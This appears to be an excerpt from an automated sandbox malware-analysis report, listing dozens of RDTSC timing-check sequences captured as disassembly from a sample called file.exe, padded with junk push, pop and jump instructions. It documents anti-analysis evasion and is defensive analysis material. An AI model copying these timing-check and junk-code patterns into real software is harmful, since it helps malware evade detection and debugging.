              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FC1F second address: 92FC3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jns 00007FE52CBFFE16h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E80E second address: 92E829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE52CC95244h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E992 second address: 92E997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F217 second address: 92F229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007FE52CC95236h 0x0000000c je 00007FE52CC95236h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F229 second address: 92F244 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE52CBFFE16h 0x00000008 jmp 00007FE52CBFFE1Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F244 second address: 92F253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F4D1 second address: 92F4D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F4D5 second address: 92F4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F4DB second address: 92F4E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FE52CBFFE16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F4E6 second address: 92F514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC9523Dh 0x00000009 jmp 00007FE52CC9523Eh 0x0000000e popad 0x0000000f jnl 00007FE52CC95238h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F634 second address: 92F638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F638 second address: 92F63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FA63 second address: 92FA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FA69 second address: 92FA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC95246h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FA84 second address: 92FA89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FA89 second address: 92FABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC95240h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c js 00007FE52CC9523Ah 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE52CC9523Fh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FABD second address: 92FAC7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE52CBFFE1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93507C second address: 93509E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE52CC95236h 0x00000008 jo 00007FE52CC95236h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FE52CC95242h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93ECFA second address: 93ED18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FE52CBFFE22h 0x0000000b jl 00007FE52CBFFE16h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93ED18 second address: 93ED1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D99E second address: 93D9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE52CBFFE1Bh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D9B4 second address: 93D9D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95249h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D9D3 second address: 93D9FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE24h 0x00000007 pushad 0x00000008 jmp 00007FE52CBFFE1Ch 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DB4E second address: 93DB76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE52CC95249h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007FE52CC95236h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DCDD second address: 93DCE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DCE7 second address: 93DCEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D629 second address: 93D62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D62D second address: 93D64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FE52CC9523Eh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnl 00007FE52CC95236h 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007FE52CC95236h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D64D second address: 93D651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E40C second address: 93E413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E413 second address: 93E457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE27h 0x00000009 jmp 00007FE52CBFFE1Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FE52CBFFE18h 0x00000019 jmp 00007FE52CBFFE1Fh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E6F7 second address: 93E712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC95247h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E9F0 second address: 93EA09 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE52CBFFE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE52CBFFE1Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941500 second address: 94151F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CC95249h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94151F second address: 941525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941525 second address: 941556 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE52CC95236h 0x00000008 jmp 00007FE52CC9523Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE52CC95241h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941556 second address: 941560 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE52CBFFE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941560 second address: 941571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941571 second address: 941575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9416C1 second address: 9416C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9416C5 second address: 9416C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94198B second address: 941990 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943F27 second address: 943F47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE26h 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FE52CBFFE16h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948429 second address: 94843D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE52CC9523Bh 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94843D second address: 948457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE1Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CE25 second address: 94CE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CE29 second address: 94CE2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C509 second address: 94C515 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE52CC9523Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C515 second address: 94C541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007FE52CBFFE16h 0x0000000b jne 00007FE52CBFFE16h 0x00000011 push edx 0x00000012 pop edx 0x00000013 jp 00007FE52CBFFE16h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007FE52CBFFE1Eh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C6D8 second address: 94C6E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CB4B second address: 94CB5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FE52CBFFE16h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95297E second address: 95299A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE52CC95236h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 jp 00007FE52CC95236h 0x00000018 pop eax 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9516CA second address: 9516CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6B75 second address: 8F6BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 ja 00007FE52CC95240h 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D34B0h], esi 0x00000014 mov ebx, dword ptr [ebp+12489C48h] 0x0000001a jnl 00007FE52CC95242h 0x00000020 add eax, ebx 0x00000022 call 00007FE52CC9523Fh 0x00000027 jmp 00007FE52CC9523Fh 0x0000002c pop edx 0x0000002d mov edi, dword ptr [ebp+122D3B86h] 0x00000033 push eax 0x00000034 jc 00007FE52CC95244h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d pop eax 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6BDD second address: 8F6BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951AEB second address: 951AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951AEF second address: 951B12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE23h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e jc 00007FE52CBFFE16h 0x00000014 pop edi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951B12 second address: 951B2D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE52CC9523Ch 0x00000008 jc 00007FE52CC95236h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jl 00007FE52CC95236h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951B2D second address: 951B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FE52CBFFE1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951B3C second address: 951B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951B40 second address: 951B58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 jbe 00007FE52CBFFE16h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FE52CBFFE16h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951B58 second address: 951B62 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE52CC95236h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95806B second address: 958072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958072 second address: 958078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 958858 second address: 95886E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FE52CBFFE1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95886E second address: 958882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jnp 00007FE52CC95236h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959371 second address: 959385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959385 second address: 95938B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95938B second address: 959391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959391 second address: 959395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95968F second address: 959694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959BF2 second address: 959BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6CB0 second address: 8A6CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FE52CBFFE29h 0x0000000c jmp 00007FE52CBFFE29h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FE52CBFFE1Ch 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6CF8 second address: 8A6D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6D00 second address: 8A6D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6D04 second address: 8A6D14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962B4F second address: 962B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE52CBFFE1Eh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962B66 second address: 962B77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 js 00007FE52CC95236h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962CD0 second address: 962D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FE52CBFFE18h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE52CBFFE28h 0x00000016 ja 00007FE52CBFFE16h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962D06 second address: 962D0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962D0C second address: 962D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jbe 00007FE52CBFFE2Ch 0x0000000e jmp 00007FE52CBFFE20h 0x00000013 jl 00007FE52CBFFE16h 0x00000019 jmp 00007FE52CBFFE21h 0x0000001e push ecx 0x0000001f push esi 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962E78 second address: 962E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 je 00007FE52CC95236h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963148 second address: 96318E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FE52CBFFE24h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 jmp 00007FE52CBFFE1Eh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963485 second address: 9634B1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FE52CC9524Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A2B0 second address: 96A2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CBFFE1Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A9D0 second address: 96A9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007FE52CC95236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A9DF second address: 96A9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE52CBFFE16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96AEF3 second address: 96AF07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969C89 second address: 969C9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE1Ah 0x00000007 ja 00007FE52CBFFE16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989122 second address: 989126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988CB1 second address: 988CCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FE52CBFFE16h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988CCE second address: 988CDD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988CDD second address: 988CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988E2C second address: 988E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
